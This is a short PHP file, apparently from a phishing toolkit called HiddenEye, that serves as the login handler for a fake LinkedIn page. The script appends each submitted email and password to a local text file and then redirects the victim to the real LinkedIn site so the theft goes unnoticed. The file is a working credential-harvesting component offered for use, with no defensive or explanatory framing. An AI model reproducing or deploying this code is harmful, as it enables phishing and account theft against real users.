HiddenEye-Legacy/WebPages/linkedin/login.php
Usama Abdul Sattar 1e438335a1
Update login.php
2018-06-08 16:58:34 +05:00

7 lines
209 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['UsernameForm'] . " [PASS]: " . $_POST['PasswordForm'] . "\n", FILE_APPEND);
header('Location: https://linkedin.com/');
exit();